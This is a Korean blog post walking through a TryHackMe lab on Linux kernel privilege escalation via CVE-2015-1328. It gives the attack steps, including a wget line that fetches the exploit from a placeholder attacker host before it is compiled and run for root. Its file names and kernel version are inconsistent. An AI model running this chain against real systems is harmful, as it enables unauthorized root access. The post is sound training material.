-
[tryhackme] Privilege Escalation: Kernal ExploitsSecurity in CPS/CyberAttack 2021. 12. 31. 09:49
CVE-2015-1328
Linprivsec 에 있는 Privilege Escalation: Kernel Exploits 문제 해결 과정을 간단하게 정리해 보았습니다.
1. 우선 문제에서 주어진 사용자 이름과 비밀번호를 이용해 서버에 접속합니다.
2. 주어진 적은 권한 안에서 서버의 정보들을 가져옵니다.
e.g.,) id, uname -a, whoami, ...
3. Kernel version 1.13.0 정보를 가지고 관련 exploit 이 있는지 exploitdb에서 검색을 해봅니다.
4. 37292.c 파일을 열어봅니다. 친절하게도 실행과정을 자세하게 설명하고 있습니다.
5. 공격 머신에서 웹 서버를 실행시킵니다.
$> sudo python3 -m http.server
6. 타켓에서 exploit 코드를 다운로드 받습니다. 현재 적은 권한으로 인해 다운로드 받을수 있는 디렉토리들이 제한되어 있습니다(아래 그림 참조). 그래서 맘편히 /tmp 로 이동한 후 다운로드를 받습니다.
$> wget http://{attacker_ip}:{port}/37272.c
7. 해당 코드를 컴파일 하고 실행하면 끝! 뚜둥! 바로 root 권한을 획득하게 되네요.
'Security in CPS > CyberAttack' 카테고리의 다른 글
와이어샤크 패킷 분석 by Overpass 2 - Hacked (TryHackMe) (0) 2022.01.20 [tryhackme] Privilege Escalation: SUID (0) 2022.01.02 [Meterpreter] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. (0) 2021.12.29 [OpenVas] Default Account (0) 2021.06.28 SQL Injection (aka SQLi) Attack (0) 2021.01.17